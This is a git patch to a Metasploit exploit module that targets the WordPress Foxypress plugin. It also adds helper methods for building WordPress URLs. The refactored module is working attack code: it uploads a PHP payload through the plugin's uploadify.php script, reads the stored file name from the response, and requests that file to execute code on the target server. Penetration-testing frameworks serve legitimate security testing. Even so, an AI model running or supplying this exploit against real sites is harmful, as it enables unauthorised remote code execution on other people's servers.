From d33479711674e8d4b495e90fa45581ec090d0b71 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <FireFart@gmail.com>
Date: Mon, 28 Jul 2014 22:23:22 +0200
Subject: [PATCH] Updated foxpress module

---
 lib/msf/http/wordpress/uris.rb                | 21 +++++
 .../unix/webapp/php_wordpress_foxypress.rb    | 81 +++++++------------
 2 files changed, 51 insertions(+), 51 deletions(-)

diff --git a/lib/msf/http/wordpress/uris.rb b/lib/msf/http/wordpress/uris.rb
index 659b419572..1060354113 100644
--- a/lib/msf/http/wordpress/uris.rb
+++ b/lib/msf/http/wordpress/uris.rb
@@ -80,4 +80,25 @@ module Msf::HTTP::Wordpress::URIs
     normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php')
   end
 
+  # Returns the Wordpress wp-content dir URL
+  #
+  # @return [String] Wordpress wp-content dir URL
+  def wordpress_url_wp_content
+    normalize_uri(target_uri.path, wp_content_dir)
+  end
+
+  # Returns the Wordpress plugins dir URL
+  #
+  # @return [String] Wordpress plugins dir URL
+  def wordpress_url_plugins
+    normalize_uri(wordpress_url_wp_content, 'plugins')
+  end
+
+  # Returns the Wordpress themes dir URL
+  #
+  # @return [String] Wordpress themes dir URL
+  def wordpress_url_themes
+    normalize_uri(wordpress_url_wp_content, 'themes')
+  end
+
 end
diff --git a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
index e769b8c993..ac738016b1 100644
--- a/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
+++ b/modules/exploits/unix/webapp/php_wordpress_foxypress.rb
@@ -8,17 +8,19 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
-  include Msf::Exploit::Remote::HttpClient
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
+    super(update_info(
+      info,
       'Name'           => 'WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution',
-      'Description'    => %q{
+      'Description'    => %q(
           This module exploits an arbitrary PHP code execution flaw in the WordPress
         blogging software plugin known as Foxypress. The vulnerability allows for arbitrary
         file upload and remote code execution via the uploadify.php script. The Foxypress
         plug-in versions 0.4.2.1 and below are vulnerable.
-      },
+      ),
       'Author'         =>
         [
           'Sammy FORGIT', # Vulnerability Discovery, PoC
@@ -27,79 +29,56 @@ class Metasploit3 < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          ['EDB', '18991'],
-          ['OSVDB', '82652'],
-          ['BID', '53805'],
+          %w(EDB 18991),
+          %w(OSVDB 82652),
+          %w(BID 53805)
         ],
       'Privileged'     => false,
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'ConnectionType' => 'find',
-            },
-        },
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
-      'Targets'        => [[ 'Automatic', { }]],
+      'Targets'        => [['Foxypress <= 0.4.2.1', {}]],
       'DisclosureDate' => 'Jun 05 2012',
       'DefaultTarget' => 0))
-
-    register_options(
-      [
-        OptString.new('TARGETURI', [true, "The full URI path to WordPress", "/"]),
-      ], self.class)
   end
 
   def check
-    uri = target_uri.path
-
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php")
-    })
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php')
+    )
 
-    if res and res.code == 200
-      return Exploit::CheckCode::Detected
-    else
-      return Exploit::CheckCode::Safe
-    end
+    return Exploit::CheckCode::Detected if res && res.code == 200
+
+    Exploit::CheckCode::Safe
   end
 
   def exploit
-
-    uri = normalize_uri(target_uri.path)
-    uri << '/' if uri[-1,1] != '/'
-
-    peer = "#{rhost}:#{rport}"
-
     post_data = Rex::MIME::Message.new
-    post_data.add_part("<?php #{payload.encoded} ?>", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
+    post_data.add_part("<?php #{payload.encoded} ?>", 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{rand_text_alphanumeric(6)}.php\"")
 
     print_status("#{peer} - Sending PHP payload")
 
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'POST',
-      'uri'    => normalize_uri(uri, "wp-content/plugins/foxypress/uploadify/uploadify.php"),
-      'ctype'  => 'multipart/form-data; boundary=' + post_data.bound,
+      'uri'    => normalize_uri(wordpress_url_plugins, 'foxypress', 'uploadify', 'uploadify.php'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
       'data'   => post_data.to_s
-    })
+    )
 
-    if not res or res.code != 200 or res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
+    if res.nil? || res.code != 200 || res.body !~ /\{\"raw_file_name\"\:\"(\w+)\"\,/
       print_error("#{peer} - File wasn't uploaded, aborting!")
       return
     end
 
-    print_good("#{peer} - Our payload is at: #{$1}.php! Calling payload...")
-    res = send_request_cgi({
+    filename = "#{Regexp.last_match[1]}.php"
+
+    print_good("#{peer} - Our payload is at: #{filename}. Calling payload...")
+    register_files_for_cleanup(filename)
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri'    => normalize_uri(uri, "wp-content/affiliate_images", "#{$1}.php")
-    })
-
-    if res and res.code != 200
-      print_error("#{peer} - Server returned #{res.code.to_s}")
-    end
+      'uri'    => normalize_uri(wordpress_url_wp_content, 'affiliate_images', filename)
+    )
 
+    print_error("#{peer} - Server returned #{res.code}") if res && res.code != 200
   end
-
 end